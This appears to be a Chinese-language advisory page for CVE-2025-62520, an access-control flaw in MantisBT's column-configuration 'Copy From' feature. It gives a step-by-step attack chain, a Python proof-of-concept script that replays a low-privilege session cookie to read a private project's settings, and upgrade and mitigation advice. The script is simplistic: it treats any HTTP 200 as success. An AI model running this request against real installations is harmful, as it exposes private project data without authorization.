CVE-2025-62520 MantisBTmanage_config_columns_page.php访问控制绕过漏洞

漏洞信息

漏洞编号

CVE-2025-62520

漏洞类型

访问控制绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Mantis Bug Tracker (MantisBT)

漏洞概述

Mantis Bug Tracker（MantisBT）是一款开源的问题跟踪系统。在2.27.1及以下版本中，由于manage_config_columns_page.php页面存在不足的访问级别检查，任何具有访问权限的非管理员用户都可以利用"Copy From"功能，从他们本无权访问的私有项目中获取列配置信息。该漏洞的CVSS评分为4.3，属于中等严重程度，主要影响系统的机密性。攻击者利用此漏洞可以在未经授权的情况下访问其他私有项目的敏感配置数据，可能导致敏感信息泄露。虽然漏洞利用不需要复杂的攻击技术，但攻击者需要具备基本的用户账户和系统访问权限。官方已在2.27.2版本中修复了此问题。

技术细节

该漏洞存在于MantisBT的配置文件管理页面manage_config_columns_page.php中。漏洞的根本原因是程序在实现"Copy From"功能时，未能正确验证当前用户对目标项目的访问权限。具体来说，当用户尝试从其他项目复制列配置时，系统仅检查了用户是否有权限访问配置管理页面，而没有验证用户是否有权访问被复制来源的私有项目。攻击者只需拥有一个低权限的普通用户账户，即可通过构造特定的HTTP请求，指定一个私有项目的ID作为Copy From参数，从而获取该私有项目的列配置信息。配置信息可能包含项目特定的设置、字段名称等敏感数据。攻击过程无需特殊的技术手段，属于典型的水平权限提升漏洞。修复方案需要在执行Copy From操作前，增加对目标项目访问权限的验证逻辑。

攻击链分析

STEP 1

步骤1

攻击者获取MantisBT系统的低权限用户账户

STEP 2

步骤2

攻击者访问manage_config_columns_page.php配置管理页面

STEP 3

步骤3

攻击者构造Copy From请求，指定目标私有项目的ID作为参数

STEP 4

步骤4

系统未能正确验证用户对目标私有项目的访问权限

STEP 5

步骤5

攻击者成功获取私有项目的列配置信息，导致敏感数据泄露

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62520 PoC - MantisBT Access Control Bypass
# Target: manage_config_columns_page.php
# Vulnerability: Insufficient access check on 'Copy From' action

import requests
import sys

def exploit_cve_2025_62520(target_url, session_cookie, private_project_id):
    """
    Exploit for CVE-2025-62520: MantisBT access control bypass
    
    Parameters:
        target_url: Base URL of MantisBT instance
        session_cookie: Valid session cookie for low-privilege user
        private_project_id: ID of private project to extract config from
    
    Returns:
        Configuration data from private project
    """
    headers = {
        'Cookie': f'PHPSESSID={session_cookie}',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    # Step 1: Access the config columns management page
    config_url = f'{target_url}/manage_config_columns_page.php'
    
    # Step 2: Exploit the 'Copy From' action to retrieve private project config
    exploit_data = {
        'copy_from': private_project_id,
        'action': 'copy_columns'
    }
    
    response = requests.post(config_url, headers=headers, data=exploit_data)
    
    if response.status_code == 200:
        print(f'[+] Successfully extracted config from project ID: {private_project_id}')
        return response.text
    else:
        print(f'[-] Exploitation failed with status code: {response.status_code}')
        return None

if __name__ == '__main__':
    if len(sys.argv) < 4:
        print('Usage: python cve_2025_62520.py <target_url> <session_cookie> <private_project_id>')
        sys.exit(1)
    
    target_url = sys.argv[1]
    session_cookie = sys.argv[2]
    private_project_id = sys.argv[3]
    
    result = exploit_cve_2025_62520(target_url, session_cookie, private_project_id)
    if result:
        print('[+] Config data retrieved successfully')

影响范围

MantisBT < 2.27.2

防御指南

临时缓解措施

立即将MantisBT升级到2.27.2或更高版本以修复该漏洞。如果无法立即升级，可以暂时限制非管理员用户访问manage_config_columns_page.php页面，或在Web应用防火墙（WAF）层面添加访问控制规则，阻止对copy_from参数的恶意利用。同时建议审查现有用户权限，确保遵循最小权限原则。